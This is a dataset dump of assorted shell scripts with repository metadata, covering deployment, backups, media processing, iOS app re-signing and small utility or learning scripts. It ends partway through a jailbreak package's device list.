| true |
52721ec8252deda57637432b0c6427e6bfab8fc5 | Shell | smart-coffee/device-api | /docker/docker-entrypoint.sh | UTF-8 | 688 | 2.765625 | 3 | [] | no_license | #!/bin/sh
cd src
env_file=".env"
if [ ! -e "$env_file" ]
then
cat <<EOF >$env_file
MODE=prod
# Should be empty in $local_mode environment
CERT_FILE=""
KEY_FILE=""
# Customize as needed
APP_HOST=0.0.0.0
APP_PORT=80
#############################
## Configured in balena.io ##
# SECRET_KEY= #
# APP_URL_PREFIX= #
#############################
# Should be empty in $local_mode environment
SWAGGER_BASE_URL=""
#############################
## Configured in balena.io ##
# WEBAPI_DOMAIN= #
# WEBAPI_PORT= #
#############################
SSL_CA_BUNDLE='/etc/ssl/certs/ca-certificates.crt'
EOF
fi
modprobe i2c-dev
python -u app.py
| true |
12c08f60d139a821b5dca4e99d3422972e1ae95f | Shell | askDing/bash_learning | /dialog_learn.sh | UTF-8 | 501 | 3.328125 | 3 | [] | no_license | #! /bin/bash
# dialog 需要安装
name='cat name'
while [ "$name" != "cosmos"] ; do
dialog --inputbox "Please input username" 40 80 2 >name
name=`cat name`
done
dialog --msgbox "Welcome to sutdent Information System" 10 20
while [ : ]
do
dialog --menu "Choose your operatin:" 10 80 3 1 "Add Student info" 2 Delete Student info 3 "Modify Student info" 4 exit 2> menu.txt
menu=`cat menu.txt`
dialog --msgbox "Your choose is $menu" 10 20
if [ $menu -eq 4 ]; then
exit 0
fi
done
| true |
4db1cf95da570d0ae88f36470ccd1ce9e83b5630 | Shell | jasoncheng7115/it-scripts | /proxmoxve/bakpveconf.sh | UTF-8 | 179 | 2.71875 | 3 | [] | no_license | #!/bin/bash
# bakpveconf.sh
hostname=$(hostname)
fn_date=$(date "+%Y%m%d.%H%M")
bak_targetpath=$1
/bin/tar -zcvf ${bak_targetpath}/pveconf_${hostname}_${fn_date}_.tar.gz /etc/pve
| true |
8daa0a18617ea56388c78b231a5808ae5ffdf4a3 | Shell | ToM-MaS/GPiBE | /hooks/03-gbe-hooks.sh.chroot | UTF-8 | 453 | 3.390625 | 3 | [
"BSD-3-Clause"
] | permissive | #!/bin/bash
#
# GemeinschaftPi
# Run hook scripts from GBE
#
# Copyright (c) 2013, Julian Pawlowski <jp@jps-networks.eu>
# See LICENSE.GPiBE file for details.
#
[ -e /etc/gemeinschaft/system.conf ] && source /etc/gemeinschaft/system.conf || echo "FATAL ERROR: Local configuration file in /etc/gemeinschaft/system.conf missing"
set -e
echo -e "GPiBE: Now running hook files from GBE upstream ..."
for FILE in /be/upstream/GBE/config.v3/hooks/*.sh.chroot; do
${FILE}
done
| true |
d37aef21becbe01166b00c49f4d9d8d66944247e | Shell | rislah/grpc-client-server | /ci/scripts/deploy.sh | UTF-8 | 1,931 | 3.796875 | 4 | [] | no_license | #!/bin/sh
set -eo pipefail
if [ -z "$APISERVER_ADDR" ]; then
echo "Missing APISERVER_ADDR"
exit 1
fi
if [ -z "$HELM_INSTALL" ]; then
echo "Missing HELM_INSTALL"
exit 1
fi
if [ -z "$CA" ]; then
echo "Missing CA"
exit 1
fi
if [ -z "$TOKEN" ]; then
echo "Missing TOKEN"
exit 1
fi
setup_kube() {
echo "$TOKEN" | base64 -d > token
echo "$CA" | base64 -d > ca.crt
kubectl config set-credentials drone --token="$(cat ./token)"
kubectl config set-cluster kubernetes --server="$APISERVER_ADDR" --certificate-authority=ca.crt
kubectl config set-context drone --cluster=kubernetes --user=drone --namespace=default
kubectl config use-context drone
chmod 755 ~/.kube/config
kubectl version
}
staging() {
productionColor=$(helm get values --all "$HELM_INSTALL" | grep -Po "prod: \K.*" )
stagingColor=$(helm get values --all "$HELM_INSTALL" | grep -Po 'staging: \K.*')
printf "Staging: %s\\nProduction: %s" "$stagingColor\n" "$productionColor"
cd "$(git rev-parse --show-toplevel)/charts/$HELM_INSTALL"
helm upgrade --install $HELM_INSTALL . --reuse-values -f env.yaml --set "deployment.$stagingColor.enabled=true" --set "deployment.$stagingColor.client.image.tag=$TAG" --set "deployment.$stagingColor.server.image.tag=$TAG" "$ADDITIONAL_STAGING_ARGS"
}
switch() {
productionColor=$(helm get values --all "$HELM_INSTALL" | grep -Po "prod: \K.*" )
stagingColor=$(helm get values --all "$HELM_INSTALL" | grep -Po 'staging: \K.*')
printf "Staging: %s\nProduction: %s" "$stagingColor\n" "$productionColor"
cd "$(git rev-parse --show-toplevel)/charts/$HELM_INSTALL"
helm upgrade --install $HELM_INSTALL . --reuse-values -f env.yaml --set "deployment.prod=$stagingColor" --set deployment.staging="$productionColor" "$ADDITIONAL_SWITCH_ARGS"
}
setup_kube
if [ -n "$SWITCH" ]; then
switch
fi
if [ -n "$STAGING" ]; then
staging
fi
| true |
ada1945bddbe8137f9cfa992cd267cc8e49c1e8b | Shell | nstoykov/c2cgeoportal | /ci/publish-documentation | UTF-8 | 427 | 3.28125 | 3 | [
"BSD-2-Clause-Views"
] | permissive | #!/bin/bash -ex
GIT_REV=$(git log | head --lines=1 | awk '{{print $2}}')
ci/extract-documentation /tmp/doc
git checkout gh-pages
if [ -e ${MAIN_BRANCH} ]
then
git rm -r --force -- ${MAIN_BRANCH}
fi
mv /tmp/doc/html ${MAIN_BRANCH}
git add --all ${MAIN_BRANCH}
git commit --message="Update documentation for the revision ${GIT_REV}" || true
git push origin gh-pages
# Back to the original branch
git checkout ${GIT_REV}
| true |
e206b5082c629931dd821bf53c9a57b6314758b0 | Shell | jluccisano/GenerixTools | /deploy_bb_project.sh | UTF-8 | 1,364 | 2.796875 | 3 | [] | no_license | #!/bin/sh
gencore_mobile_home=/home/jluccisano/work/workspaces/workspace_BB/Gencore_mobile_bb
codename=$gencore_mobile_home/deliverables/Standard/6.0.0/Gencore_mobile_bb
sourceroot=$gencore_mobile_home/res;$gencore_mobile_home/src/main/java
import_api=/home/jluccisano/work/tools/blackberry/net.rim.ejde.componentpack6.0.0_6.0.0.29/components/lib/net_rim_api.jar
classpath=$gencore_mobile_home/bin
rapc -quiet codename=%codename% %codename%.rapc -sourceroot=%sourceroot% -import=%import_api% %classpath%
bjavaloader -u load %gencore_mobile_home%\deliverables\Standard\6.0.0\Gencore_mobile_bb.cod
So, there is absolutely nothing special about running the cod compiler.
I have jmIrc running on my BB now.
here is the sequence of actions:
1. Compile normal midp-2.0 midlet with J2ME SDK from Sun
2. set up $WTK_HOME to point to your J2ME install, $RIM to point to
your JDE/MDS/classpath, and $APPNAME to your app name
4. cd to $WTK_HOME/apps/$APPNAME
3. run
PATH=$WTK_HOME/bin:$PATH \
java -jar $RIM/rapc.jar import=$RIM/net_rim_api.jar \
codename=$APPNAME -midlet jad=bin/$APPNAME.jad bin/$APPNAME.jar
Your .cod file will end up in current dir. bin/$APPNAME.jad will be modified to contain all
BB-specific info.
That's it folks!
P.S. Of course - running emulator and all other stuff will require more work,
but I personally don't care enough for now.
| true |
f3167773e759487b7e9593f4b5519fdc8f8e0147 | Shell | moki9/eRCaGuy_dotfiles | /useful_scripts/git-branch_.sh | UTF-8 | 2,181 | 3.859375 | 4 | [
"MIT"
] | permissive | #!/bin/bash
# This file is part of eRCaGuy_dotfiles: https://github.com/ElectricRCAircraftGuy/eRCaGuy_dotfiles
# DESCRIPTION:
#
# Same as `git branch` except don't show "hidden", user-backed-up branches.
#
# A special version of `git branch` which hides (doesn't show) any branches which begin with either
# PREFIX1 or PREFIX2 below and would normally show up when you run `git branch`.
#
# This is useful, for instance, so that you can prefix all backup branches with `z-bak` or `_`
# (examples: `z-bak-my_backup_branch_name` or `_my_backup_branch_name`), withOUT having them
# clutter your screen whenever you run `git branch_`. Simply run `git branch_` in place of `git
# branch` from now on.
#
# Since it's a simple wrapper around `git branch`, it takes any and all input parameters/options
# accepted by `git branch`!
#
# For details, see my Stack Overflow answer here: https://stackoverflow.com/a/66574807/4561887.
# INSTALLATION INSTRUCTIONS:
# 1. Create a symlink in ~/bin to this script so you can run it from anywhere as `git branch_` OR
# as `git-branch_` OR as `gs_git-branch_` OR as `git gs_branch_`. Note that "gs" is my initials.
# I do these versions with "gs_" in them so I can find all scripts I've written really easily
# by simply typing "gs_" + Tab + Tab, or "git gs_" + Tab + Tab.
# cd /path/to/here
# mkdir -p ~/bin
# ln -si "${PWD}/git-branch_.sh" ~/bin/git-branch_ # required
# ln -si "${PWD}/git-branch_.sh" ~/bin/git-gs_branch_ # optional; replace "gs" with your initials
# ln -si "${PWD}/git-branch_.sh" ~/bin/gs_git-branch_ # optional; replace "gs" with your initials
# 2. Now you can use this command directly anywhere you like in any of these 5 ways:
# 1. `git branch_` <=== my preferred way to use this program, so it feels just like `git branch`!
# 2. `git-branch_`
# 3. `git gs_branch_`
# 4. `git-gs_branch_`
# 3. `gs_git-branch_`
# Ignore (don't print with `git branch_`) branch names which begin with
# these prefix strings
PREFIX1="z-bak"
PREFIX2="_"
git branch --color=always "$@" \
| grep --color=never -v "^ $PREFIX1" \
| grep --color=never -v "^ $PREFIX2"
| true |
ee18abd5264e3417ffbdeb36f510ec7c1ae3fa51 | Shell | crzidea/local-bin | /npm-lazyinstall | UTF-8 | 696 | 3.328125 | 3 | [] | no_license | #!/usr/bin/env sh
# env: NPM_LAZYINSTALL_HOST
package_name=`node -p "require('./package.json').name"`
dist_dir="~/.tmp/${package_name}"
dist="${NPM_LAZYINSTALL_HOST}:${dist_dir}"
ssh="ssh -o StrictHostKeyChecking=no"
$ssh $NPM_LAZYINSTALL_HOST "mkdir -p ${dist_dir}/"
rsync -az -e "$ssh" "${dist}/package.json" .previous-package.json
diff package.json .previous-package.json 2>/dev/null
if [[ $? -eq 0 && -z "$REINSTALL" ]]; then
rsync -az -e "$ssh" --delete "${dist}/node_modules" ./
echo modules are loaded from $dist/
else
npm install
rsync -az -e "$ssh" package.json "${dist}/package.json"
rsync -az -e "$ssh" --delete node_modules "${dist}/"
echo modules are saved at $dist/
fi
| true |
981767c6de7fbec47e07c3610dffefd6c3ab0002 | Shell | lbrayner/mysql_tools | /mysql_dump.sh | UTF-8 | 1,124 | 4.09375 | 4 | [] | no_license | #!/bin/sh
set -e
# set -x
script_name="$(basename "${0}")"
print_usage() {
printf '\n%s\n' "${script_name} [-h] [-d FOLDER] [-c CLASSIFIER] [-p TEMPDIR]\
[-- ARGS...]"
}
generate_timestamp(){
date +'%Y%m%d_%H%M_%N'
}
if [ ! ${#} -gt 0 ]
then
print_usage 1>&2
exit 1
fi
classifier=""
destination="."
tmpdir="/tmp"
prefix="mysql_dump"
while getopts ":hc:d:p:" opt
do
case ${opt} in
c)
classifier="${OPTARG}"
;;
d)
destination="${OPTARG}"
;;
p)
tmpdir="${OPTARG}"
;;
h)
print_usage
exit 0
;;
\?)
;;
esac
done
shift $((OPTIND - 1))
destination="$(readlink -f "${destination}")"
if [ ! -d "${destination}" ]
then
echo "'${destination}' is not a folder." 1>&2
exit 1
fi
name="${prefix}${classifier}$(generate_timestamp).sql"
dump_file_dir="$(mktemp -d -p "${tmpdir}")"
cd "${dump_file_dir}"
zip_file="${destination}/${name}.zip"
mysqldump --no-tablespaces "${@}" > "${name}"
zip "${zip_file}" "${name}"
cd -
rm -rf "${dump_file_dir}"
| true |
978b104aed8643b05303f15e4a7a1e648ba34ded | Shell | lsmakethebest/LSiOSShell | /resign/resign.sh | UTF-8 | 8,430 | 3.8125 | 4 | [] | no_license |
#!/bin/bash
RED='\033[31m' # 红
GREEN='\033[32m' # 绿
CYAN='\033[36m' # 蓝
RES='\033[0m' # 清除颜色
need_verbose=""
echoRed(){
echo -e "${RED}${1}${RES}"
}
echoGREEN(){
if [[ "$need_verbose" != "" ]]; then
echo -e "${GREEN}${1}${RES}"
fi
}
echoCYAN(){
if [[ "$need_verbose" != "" ]]; then
echo -e "${CYAN}${1}${RES}"
fi
}
echoResult() {
echo -e "${GREEN}${1}${RES}"
}
usage(){
echoResult '请输入参数:'
echoResult '\t必传参数1:ipa目录'
echoResult '\t必传参数2:描述文件目录'
echoResult "\t必传参数3:证书SHA-1值,注意用 \"\" 双引号包起来,因为有可能有空格,内部会自动过滤空格"
echoResult '\t可选参数 -b new_bundle_identifier'
echoResult '\t可选参数 -e entitlements_file 目录用于签名,不指定则使用描述文件里的配置自动生成 entitlements_file'
echoResult '\t可选参数 -v 打印详细日志'
echoResult '\t可选参数 -h 查看使用说明'
}
if [ $# -lt 3 ]; then
usage
exit
fi
original_ipa_file=""
mobileprovision_file=""
certificate_name=""
if ! ([ -f "$1" ]); then
echoRed "参数1:IPA文件不存在 ${1}"
exit
fi
if ! ([ -f "$2" ]); then
echoRed "参数2:描述文件不存在 ${2}"
exit
fi
if ([ "$3" == "" ]); then
echoRed "参数3:证书名称不能为空 ${3}"
exit
fi
original_ipa_file=$1
mobileprovision_file=$2
temp_certificate_name=$3
certificate_name=${temp_certificate_name// /}
user_app_entitlements_file=""
new_bundle_identifier=""
sign_entitlements_file=""
user_app_entitlements=""
shift 3
# 解析参数
while [ "$1" != "" ]; do
case $1 in
-e | --entitlements )
shift
user_app_entitlements_file="$1"
user_app_entitlements="1"
;;
-b | --bundle-id )
shift
new_bundle_identifier="$1"
;;
-n | --version-number )
shift
VERSION_NUMBER="$1"
;;
--short-version )
shift
SHORT_VERSION="$1"
;;
--bundle-version )
shift
BUNDLE_VERSION="$1"
;;
-v | --verbose )
need_verbose="--verbose"
;;
-h | --help )
usage
;;
* )
;;
esac
# Next arg
shift
done
echoGREEN "-----------------输入参数---------------------"
echoGREEN " 即将签名的IPA文件:${original_ipa_file}"
echoGREEN " 使用的描述文件:${mobileprovision_file}"
echoGREEN " 签名证书名称:${certificate_name}"
echoGREEN " 新bundleID:${new_bundle_identifier}"
echoGREEN " entitlements文件目录:${user_app_entitlements_file}"
echoGREEN '---------------------------------------------'
if [[ "$user_app_entitlements" == "1" ]]; then
if ! ([ -e "$user_app_entitlements_file" ]); then
echoRed "-e 参数:plist文件不存在 -> "${3}
exit
else
sign_entitlements_file="$user_app_entitlements_file"
fi
fi
IpaFileName=$(basename "$original_ipa_file" .ipa)
#存放ipa的目录
original_ipa_path=$(dirname "$original_ipa_file")
unzip_path="${original_ipa_path}"/temp_unzip
rm -rf ${original_ipa_path}/${IpaFileName}-resign.ipa
unzip -oq "$original_ipa_file" -d "${unzip_path}"
if ([ "$sign_entitlements_file" == "" ]); then
# 将描述文件转换成plist
mobileprovision_plist="${unzip_path}/mobileprovision.plist"
#生成plist主要是查看描述文件的信息
security cms -D -i "$mobileprovision_file" > "$mobileprovision_plist"
teamId=`/usr/libexec/PlistBuddy -c "Print Entitlements:com.apple.developer.team-identifier" "$mobileprovision_plist"`
application_identifier=`/usr/libexec/PlistBuddy -c "Print Entitlements:application-identifier" "$mobileprovision_plist"`
#描述文件budnleid
mobileprovision_bundleid=${application_identifier/$teamId./}
# echoGREEN '描述文件中的bundleid: '$mobileprovision_bundleid
mobileprovision_entitlements_plist="${unzip_path}/mobileprovision_entitlements.plist"
/usr/libexec/PlistBuddy -x -c "Print Entitlements" "$mobileprovision_plist" > "$mobileprovision_entitlements_plist"
sign_entitlements_file="$mobileprovision_entitlements_plist"
fi
echoGREEN "使用的entitlemetns文件:$sign_entitlements_file"
#filePath 例如 xx.app xx.appex xx.dylib xx.framework
signFile(){
filePath="$1";
suffixStr=${filePath##*.};
newID=$new_bundle_identifier;
echoCYAN "正在签名 ${filePath}"
if [ "$newID" != "" ] && [ "$suffixStr" != "framework" ] && [ "$suffixStr" != "dylib" ];then
bundleId=$(/usr/libexec/PlistBuddy -c "Print CFBundleIdentifier " "${filePath}/Info.plist")
ExtensionID=${bundleId/"$OldbundleId"/"$new_bundle_identifier"}
/usr/libexec/PlistBuddy -c "Set CFBundleIdentifier $ExtensionID" "${filePath}/Info.plist"
echoCYAN "bundlieId 旧ID:${bundleId} 新ID:${ExtensionID}"
WKCompanionAppBundleIdentifier=`/usr/libexec/PlistBuddy -c "Print WKCompanionAppBundleIdentifier" "${filePath}/Info.plist" 2> /dev/null`
if [ "$WKCompanionAppBundleIdentifier" != "" ];then
echoCYAN "WKCompanionAppBundleIdentifier 旧ID:${WKCompanionAppBundleIdentifier} 新ID:${new_bundle_identifier}"
/usr/libexec/PlistBuddy -c "Set WKCompanionAppBundleIdentifier $new_bundle_identifier" "${filePath}/Info.plist"
fi
WKAppBundleIdentifier=`/usr/libexec/PlistBuddy -c "Print NSExtension:NSExtensionAttributes:WKAppBundleIdentifier" "${filePath}/Info.plist" 2> /dev/null`
if [ "$WKAppBundleIdentifier" != "" ];then
NEW_WKAppBundleIdentifier=${WKAppBundleIdentifier/"$OldbundleId"/"$new_bundle_identifier"}
echoCYAN "WKAppBundleIdentifier 旧ID:${WKAppBundleIdentifier} 新ID:${NEW_WKAppBundleIdentifier}"
/usr/libexec/PlistBuddy -c "Set NSExtension:NSExtensionAttributes:WKAppBundleIdentifier ${NEW_WKAppBundleIdentifier}" "${filePath}/Info.plist"
fi
fi
if [ "$suffixStr" != "dylib" ];then
rm -rf "${filePath}/_CodeSignature"
#拷贝配置文件到Payload目录下
cp "$mobileprovision_file" "${filePath}/embedded.mobileprovision"
fi
(/usr/bin/codesign $need_verbose -f -s "$certificate_name" --entitlements="$sign_entitlements_file" "$filePath") || {
echoRed "签名失败 ${filePath}"
rm -rf "${unzip_path}"
exit
}
echoCYAN "签名结束 ${filePath}"
}
AppPackageName=$(ls "${unzip_path}/Payload" | grep ".app$" | head -1)
AppPackageName=$(basename $AppPackageName .app)
echoGREEN '包名:'$AppPackageName
OldbundleId=$(/usr/libexec/PlistBuddy -c "Print CFBundleIdentifier " "${unzip_path}/Payload/${AppPackageName}.app/Info.plist")
echoGREEN '旧bundleid:'$OldbundleId;
echoGREEN '---------------------------------------------'
frameworkPath="${unzip_path}/Payload/${AppPackageName}.app/Frameworks"
if [ -d "${frameworkPath}" ]; then
echoCYAN '存在Frameworks'
echoGREEN '开始签名Frameworks'
for file in "$frameworkPath"/*; do
signFile "$file"
done
echoGREEN '签名Frameworks结束'
fi
PlugInsPath="${unzip_path}/Payload/${AppPackageName}.app/PlugIns"
if [ -d "${PlugInsPath}" ]; then
echoCYAN '存在普通扩展'
echoGREEN '开始签名普通扩展'
for file in "$PlugInsPath"/*; do
signFile "$file"
done
echoGREEN '普通扩展签名结束'
fi
WatchAppPath="${unzip_path}/Payload/${AppPackageName}.app/Watch"
if [ -d "${WatchAppPath}" ]; then
WatchAppName=$(ls ${WatchAppPath} | grep ".app$" | head -1)
watchPlugInsPath=${WatchAppPath}/${WatchAppName}/PlugIns
if [ -d "${watchPlugInsPath}" ]; then
echoCYAN 'Watch APP 存在扩展'
echoGREEN '开始签名Watch App的扩展'
for file in "$watchPlugInsPath"/*; do
signFile "$file"
done
echoGREEN 'Watch App的扩展签名结束'
fi
echoGREEN '存在Watch App'
echoGREEN '开始签名Watch App'
signFile "${WatchAppPath}/${WatchAppName}"
echoGREEN 'Watch App签名结束'
fi
#设置文件共享
#/usr/libexec/PlistBuddy -c "Set :UIFileSharingEnabled true" "${unzip_path}/Payload/${AppPackageName}.app/Info.plist"
echoGREEN '开始签名主App'
signFile "${unzip_path}/Payload/${AppPackageName}.app"
echoGREEN '主App签名结束'
cd "$unzip_path"
echoGREEN '开始压缩生成ipa'
zip -rq "${original_ipa_path}/${IpaFileName}-resign.ipa" ./*
rm -rf "${unzip_path}/"
echoGREEN '压缩完成'
echoGREEN "新IPA目录:${original_ipa_path}/${IpaFileName}-resign.ipa"
echoResult "###################### 重新签名成功 ##############################"
| true |
e982a0ea90c0b08691069b3d294c5535d8b59f92 | Shell | petronny/aur3-mirror | /httpbin-git/PKGBUILD | UTF-8 | 1,229 | 2.9375 | 3 | [] | no_license | # Maintainer: Benjamin A. Shelton <zancarius at gmail _ com>
# Source: https://github.com/zancarius/archlinux-pkgbuilds
pkgname=httpbin-git
pkgver=20130416
pkgrel=1
pkgdesc="HTTP request and response service--useful for unit testing."
arch=(any)
url="https://github.com/kennethreitz/httpbin"
license=(MIT)
conflicts=(python2-httpbin-git)
depends=(
python2-argparse
python2-blinker
python2-decorator
python2-flask
python2-flask-script
python2-gevent
python2-jinja
python2-newrelic
python2-omnijson
python2-raven
python2-werkzeug
)
makedepends=(
git
python2-distribute
)
_gitroot="https://github.com/kennethreitz/httpbin.git"
_gitname="httpbin"
build () {
cd "${srcdir}"
if [ -d "${_gitname}/.git" ] ; then
msg "Updating git repository..."
(cd "${_gitname}" && git checkout setup.py && git pull)
else
msg "Cloning git repository..."
git clone --depth=1 ${_gitroot} ${_gitname}
fi
cp -a "${_gitname}" "${_gitname}-work"
}
package () {
cd "${_gitname}-work"
python2 setup.py install --root="${pkgdir}/" --optimize=1
install -Dm0664 "${srcdir}/${_gitname}/LICENSE" "${pkgdir}/usr/share/licenses/${pkgname}/LICENSE"
} | true |
9686192b9ac9d7c93b008acae5271774a93d87c2 | Shell | kmanika/Roboshop_Shell_Project | /user.sh | UTF-8 | 411 | 2.703125 | 3 | [] | no_license | #!/bin/bash
source common.sh
# Function to check whether user is Sudo
check_user
# Verify the s/w install or not, If not installing it
SW_installed_check "nodejs"
New_user_creation "roboshop"
Code_Download "user"
Code_Install "user"
Folder_Rename "user"
print_msg "NPM install"
npm install &>> $Log_file
status_check $?
Config_file_update "user"
Systemd_DNS_update "user"
Daemon_enable
Start_Service "user"
| true |
11332afabd040bbe52244c6672f8ee5dc5102bae | Shell | Andre0512/MonitoringBot | /check_process.sh | UTF-8 | 1,015 | 3.421875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
function getPid()
{
pattern='s/\([0-9]\{1,6\}\) [\/a-zA-Z0-9]*python3 [\/\._a-zA-Z0-9]*'$1'/\1/p'
pid=$(sed -n "$pattern" <<< $result)
if [[ "$pid" != "" ]]; then
echo "True "$pid
else
echo "False "
fi
}
if [[ "$1" == "pgrep" ]]; then
if [[ "$2" == "Pi" ]]; then
result=$(ssh pi@10.5.12.9 "pgrep -a python3")
getPid $3
elif [[ "$2" == "local" ]]; then
result=$(pgrep -a python3)
getPid $3
elif [[ "$2" == "Uberspace" ]]; then
result=$(ssh abasche@abasche.de "pgrep -fl python3")
getPid $3
elif [[ "$2" == "FFW" ]]; then
result=$(ssh ffwoz@feuerwehr-oberzissen.de "pgrep -fl python")
getPid $3
elif [[ "$2" == "VPS" ]]; then
result=$(ssh andre@cloud.abasche.de "pgrep -a python3")
getPid $3
fi
elif [[ "$1" == "fhem" ]]; then
if [[ "$2" == "Pi" ]]; then
result=$(ssh pi@10.5.12.9 "/etc/init.d/fhem status")
echo $result
elif [[ "$2" == "local" ]]; then
result=$(/etc/init.d/fhem status)
echo $result
fi
fi
| true |
80a7f92b8bd8fcb9d91d39b7d468b82cdf3fcfb3 | Shell | roidayan/ovs-tests | /test-eswitch-netdev-in-ns-no-devlink-reload.sh | UTF-8 | 3,073 | 3.78125 | 4 | [] | no_license | #!/bin/bash
#
# Test interoperability of net namesapces and SRIOV/swtichdev mode
#
# [MLNX OFED] RM #3253350: CX6DX Container offload: support PF/Rep inside namespace
#
# This test is for a custom OFED version which supports loading reps in a ns
# via a WA in the driver which allows the reps to be spawned in the NS that
# the uplink netdev is in, rather than the devlink NS.
#
# The test cases are mainly to verify the rules:
# 1. PF/uplink REP can be moved in/out of a network namespace if
# eswitch is not in switchdev mode
# 2. Uplink REP can not be moved to another network namespace if
# eswitch is in switchdev mode
# 3. Representors are not lost/leaked if they were in a network
# namespace that is deleted, instead, they are evacuated to the
# root namespace. Verify no resources are leaked in such a case,
# ensuring afterwards that switchdev mode and SRIOV can be
# disabled, and that the driver can be reloaded.
#
my_dir="$(dirname "$0")"
. $my_dir/common.sh
function cleanup() {
enable_legacy
config_sriov 0
ip netns del ns0 &>/dev/null
sleep 1
}
trap cleanup EXIT
function run() {
cleanup
title "Verify uplink rep $NIC cannot be added to ns if in switchdev mode."
enable_switchdev
ip netns add ns0
ip l set dev $NIC netns ns0 && err "Expected to fail adding $NIC to ns0."
cleanup
title "Verify PF $NIC can be moved among network namespaces if sriov is enabled and in legacy mode."
ip netns add ns0
enable_legacy
config_sriov 2
ip l set dev $NIC netns ns0 2>/dev/null || err "Failed to add $NIC to ns0."
cleanup
title "Verify VF reps would be created inside network namespace that uplink rep is in."
ip netns add ns0
ip l set dev $NIC netns ns0 || err "Failed to add $NIC to ns0."
config_sriov 2
enable_switchdev
local reps_in_ns=1
declare -A role_map=( [$NIC]="Uplink rep" ["eth0"]="VF rep0" ["eth1"]="VF rep1" )
for dev in $NIC eth0 eth1; do
if ! ip netns exec ns0 test -e /sys/class/net/$dev ; then
err "${role_map[$dev]}($dev) is not found in netns ns0."
reps_in_ns=0
fi
done
if [ "$reps_in_ns" == 1 ]; then
title "Verify VF reps are cleaned up from within a net namespace when SRIOV is disabled."
config_sriov 0
for dev in eth0 eth1; do
ip netns exec ns0 test -e /sys/class/net/$dev && err "${role_map[$dev]}($dev) is not destroyed."
done
title "Verify VF reps would be evacuated from the ns upon ns deletion."
config_sriov 2
enable_switchdev
local num_devs_in_ns=`PF_IN_NS=ns0 get_reps_count $NIC`
if [ "$num_devs_in_ns" == 0 ]; then
err "Got 0 reps in ns0"
fi
ip netns del ns0
sleep 1
local num_devs_post_evacuation=`get_reps_count $NIC`
if [ $num_devs_post_evacuation -ne $num_devs_in_ns ]; then
err "Failed to evacuate all reps from ns"
fi
cleanup
reload_modules
fi
}
run
trap - EXIT
cleanup
test_done
| true |
d22fdca5307ff139dafb026235e1a65769b1929d | Shell | othermoon/sonic-field-video | /src/ffmpeg_scripts/effect_remap.sh | UTF-8 | 2,651 | 3.25 | 3 | [
"CC0-1.0"
] | permissive | #!/bin/zsh
# Description:
# Grades a clip using luminosity value and gamma, color gamma and colour levels.
# However, the color levels only impact where the particular color channel is active in the
# CR,CB and (synthetic) CG space. I.E a change in the R value will have no effect if the CR
# channel is negative (i.e. a shade of green) for example.
#
# This input is passed through a normalizer with a long time delay to bracket it.
#
# The result is passed through range limiting lut (reinhard) then a gamut limiter lut
# which tipically results in a soft pleasant look. For details see effect brighten.
#
# The net result is a 'nice video' which is not striking but will have a soft appearance and sort of work
# most of the time for youtube style video where one is not aiming for extreme HDR effects.
#
# Args:
# <video in> <brighten amount> <luma gamma amount> <chroma gamma amount> <green> <blue> <red>
#
# Examples:
#
# Warm summer day: 1.2 1.4 1.7 0.5 0.3 0.5
# Colourised effect: 1.2 1.4 3 0.2 0.2 0.2
# br | lg | cg | gr | bl | rd
# -----+-----+------+-----+-----+-----
# Warm summer day 1.2 | 1.4 | 1.7 | 0.5 | 0.3 | 0.5
# Colourised effect 1.2 | 1.4 | 3.0 | 0.2 | 0.2 | 0.2
# Gentle Old Colour 1.1 | 1.1 | 1.25 | 0.5 | 0.8 | 0.8
# The Waterfall effect 1.2 | 1.4 | 1.5 | 0.6 | 0.6 | 0.6
#
# Out:
# <*-remap-*params*>.nut
#
cg=$((1.0/${4}))
. $(dirname "$0")/encoding.sh
lut=$(get_lut bt2020-limiter)
clut=$(get_clut reinhard)
name="remap-$2-$3-$4-$5-$6-$7"
name=$( echo $name | tr . p)
cmd="${exe} -i '${1}' -i '${1}' ${enc} -filter_complex \
\"
[0:v]
zscale=
rin=full:
r=full,
format=yuv444p16le,
normalize=
independence=0:
strength=1:
smoothing=24,
geq=
lum='min(1.0,pow((lum(X,Y)/65535),${3})*${2})*65535':
cr='32767*(1+(if(lt(0,st(1, cr(X,Y)/32767-1)), ${7}, -1*${5})*pow(abs(ld(1)), ${cg})))':
cb='32767*(1+(if(lt(0,st(1, cb(X,Y)/32767-1)), ${6}, -1*${5})*pow(abs(ld(1)), ${cg})))',
zscale=
rin=full:
r=full,
format=gbrpf32le
[vin];
movie='${clut}',
zscale=rin=full:r=full,
format=gbrpf32le
[vc];
[vin][vc]
haldclut=
interp=tetrahedral,
zscale=
rin=full:
r=full,
lut3d=
file='${lut}':
interp=tetrahedral,
zscale=
rin=full:
r=full
[v]
\" -map '[v]' -map 1:a '${1%.*}-${name}.nut'"
echo
echo '================================================================================'
echo Will Run ${cmd}
echo '================================================================================'
echo
echo $cmd > run.sh
. ./run.sh
. $(dirname "$0")/review.sh "${1%.*}-${name}.nut"
| true |
a70f8f0445a3023d764311e98cb702f3777d4e44 | Shell | unimassystem/es-mate | /install | UTF-8 | 406 | 3.3125 | 3 | [] | no_license | #! /bin/bash
. functions
conf='nodes'
loadConfigure $conf
if [ $# -lt 1 ]
then
echo "Usage: $0 cluster_name <IDS(node-1,node-2)>"
listNodes
exit
fi
clusterName=$1
checkClusterName $clusterName
createConf $clusterName
echo $clusterName > .temp/cluster
echo -n 'Press any Key to Continue'
read tmp
if [ $# -eq 1 ]
then
doAllNodes doInstall
else
doListNodes doInstall $2
fi
| true |
28ca8477613f99c438f7468ba4680efc14238d81 | Shell | arshamohan/momlove | /aaa.sh | UTF-8 | 92 | 2.59375 | 3 | [] | no_license | #!/bin/bash
echo " accept two no "
read a b
s=$(expr "$a" + "$b")
echo " sum is :"
echo $s
| true |
b55499868fb681c4e7729031204c57b667e67e8f | Shell | adannawi/ECE-364 | /Prelab01/.svn/text-base/sum.bash.svn-base | UTF-8 | 135 | 3.046875 | 3 | [] | no_license | #! /bin/bash
#
#$Author$
#$Date$
#$HeadURL$
#$Revision$
SUM=0
while (( "$#" ))
do
let SUM=$SUM+$1
shift
done
echo "Result is $SUM" | true |
3ffdc325f59c882505a5aeb7017868e123b3886d | Shell | planetminguez/absinthe-2.0 | /data/common/corona2/com.chronic-dev.greenpois0n.rocky-racoon.preinst | UTF-8 | 524 | 3 | 3 | [
"FSFUL"
] | permissive | #!/bin/sh
SUPPORTED="9B206/iPad1,1
9B206/iPad2,1
9B206/iPad2,2
9B206/iPad2,3
9B206/iPad2,4
9B206/iPad3,1
9B206/iPad3,2
